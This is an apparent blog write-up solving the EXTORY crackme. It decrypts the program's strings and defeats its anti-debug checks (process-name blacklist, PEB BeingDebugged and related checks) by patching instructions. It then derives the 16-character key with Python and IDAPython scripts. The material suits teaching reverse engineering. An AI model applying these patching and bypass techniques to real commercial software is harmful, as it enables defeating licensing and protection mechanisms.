‘hielblaldkdd’. Ahh it seems like these could be our ‘Correct’ and ‘Wrong’ strings but encrypted. Now We can switch over to our nice Decompiler View to get more insight into this encryption function and maybe our password is encrypted in the same way. We can observe that WaitForSingleObject is called which checks whether the function has exited then the handle to the thread and the pointer to variable which stores the exitcode is passed to the GetExitCodeThread function. And Finally it compares the exitcode to 1. The decryption algo is pretty simple and the same for both the strings. It is as follows: (enc + 10 * enc[i+1] - 1067) So I wrote a short python script to break it down what it does. It is self explanatory. enc = "hgblelelbkjjgldd" #Correct! #enc = "hielblaldkdd" Wrong! dec = "" v23 = len(enc) v25 = 0 while(v25 < v23): c = ord(enc[v25]) d = ord(enc[v25+1]) v27 = c + 10 * d; v25 += 2; dec += chr(v27-1067) print dec So now whats next? Well I started to study the decompiled code of the Thread which does all the work in this crackme. But It was troublesome to analyse it further statically so I used IDA to debug it. So I placed a breakpoint just before the execution of the thread and it exited Dynamic Analysis So In this tutorial/writeup I’ll toggle between IDA and x64dbg as it becomes more easy to understand and patch it at the same time. Also first things first.. You should disable ASLR with the help of CFF Explorer. Just uncheck the DLL can move option and save the executable. Now load the exe in x64dbg and just keep on stepping. By Trial and Error we get to know that the fcn.1000 is responsible for closing our debugger. We step into it and again find another function ie. fcn.1D10 and please keep in mind keep on saving our database so that our breakpoints are remembered by x64dbg. We now step within the fcn.1D10 function and start analysing it as it looks interesting. At the very beginning it calls a function 4 times ie. fcn.2050 It’d be easy to just look into IDA’s decompiled version of the function as it has some weird assembly. Cool The decompiled version matches and some data is passed to the function If you’ll check it, the function is a little bit scary at first. But basically it justs xors the bytes with 0xD9 from the data passed to it and returns it. Like the bytes above decrypts to x64dbg.exe. And after it executes 4 times, the registers look like this and the 4 strings decrypted are : x64dbg.exe Taskmgr.exe javaw.exe ida64.exe Now we continue with the decompiled code and at the last its looking suspicious hmm.. It checks the return code of the fcn.2370 which later decides whether to terminate the process. And the fcn.2370 uses some functions to get the list of running processes. I keep on stepping and find that it finds smss.exe, csrss.exe, wininit.exe, services.exe, winlogon.exe, etc. Reference : https://docs.microsoft.com/en-us/windows/win32/toolhelp/taking-a-snapshot-and-viewing-processes I guess here it simply checks whether the list contains any string which we decrypted previously and decides the return code accordingly. It’ll close every process from those 4 .. Not your current debugger. Patching & Fun Now we can patch the if statement in such a way that it has a minimum effect over the program and also keeping in mind that it should work with and without a debugger. PS We can also just rename our debugger to bypass this check though. In the screenshot above, the TEST EAX,EAX checks whether the return code of fcn.2370 is 0. We want to always skip the terminate instructions so I patched it to a XOR and JMP and saved it. But I guess there is more to it. After executing the patched version the EIP gets to an invalid instruction ie. 0x12345678. Upon analysing it again I found that we still can’t pass the fcn.1000. Just somewhat below the fcn.1D10 in fcn.1000 we get fcn.2540 which does this. Its a very short one and just loads the address of Process Environment Block(ie. value of GS:[60] from the Thread Information Block), loads the byte at 0x2 index ie. BeingDebugged flag. If its true then it will load 0x12345678 into EAX and calls it which halts the program execution. Reference : https://en.wikipedia.org/wiki/Win32_Thread_Information_Block https://www.aldeid.com/wiki/PEB-Process-Environment-Block/BeingDebugged We can simply NOP those MOV and CALL instructions and save it. Ahh There is another too… but this looks same but instead of 0x12345678, it sets EIP to 0xDEADC0DE. This is also just below the previous antidebug check. But it compares some other parts from PEB. So I checked out at 0x20 .. there is FastPebLockRoutine which has the address of fast-locking routine for PEB. I didn’t get anything about why is it comparing bytes at that address to 0x2001. I just nopped the faulty instructions and again saved it. Just to keep a track, this was our 3rd patched exe. Again after executing the patched executable we get another DEADC0DE. This is not cool anymore lol. We can now just check how much DEADC0DE exists. Just Right Click and .. Search for -> Current Module -> Constant And enter DEADC0DE Cool There is only one found. We jump to the location and find that it is pretty much similar to the one we just patched. So we patch it in the same way we did the previous one. And to my surprise it doesn’t halt or exits anymore.. That means we have bypassed all anti-debug checks. KeyGen For getting our correct key, I’ll use IDA WinDebugger as its graph view is helpful for now. Ok, The StartAddress is loaded and passed into CreateThread. So our main function to put a breakpoint is sub.1A30. The first cmp instruction is the same we just patched as you can refer from the multiple nop instructions just after it. After that we have a loop that stores our input_key’s length into rax basically by looping it and checking it against a null byte. And If it is below 0x10 ie. 16 characters it displays wrong_key so the next time I entered something random like hell65abhell78cd. Later it xors our input_key bytes with 0xCD in a loop. And In next loop it xors 16 bytes (step = 2) at var_68 and var_40. And now something obvious happens.. It compares our xored input_key with the bytes we got from xoring var_68 and Var_40. Now we know that it is a simple XOR encryption which we can easily reverse. So I wrote an IDApython script which gets our key. PS The addresses here can vary on your system. v68, v40 = [], [] v68_beg = 0x0020FFEF0 v68_end = v68_beg + 32 v40_beg = 0x0020FFF18 v40_end = v40_beg + 32 for ea in range(v68_beg,v68_end,2): v68.append( Byte(ea) ) for ea in range(v40_beg,v40_end,2): v40.append( Byte(ea) ) key = "" for x,y in zip(v68,v40): key += chr((x^y) ^ 0xCD) print key This outputs 5AquUR%mH4tE=Yn9 And Hey Finally We get the Correct! Text in green. That was very satisfying, I hope the feeling is mutual. See yall in next writeup about another crackme. Next time I’m thinking maybe .NET will be fun. Don’t forget to hit me up on Twitter. Sursa: https://mrt4ntr4.github.io/EXTORY-Crackme/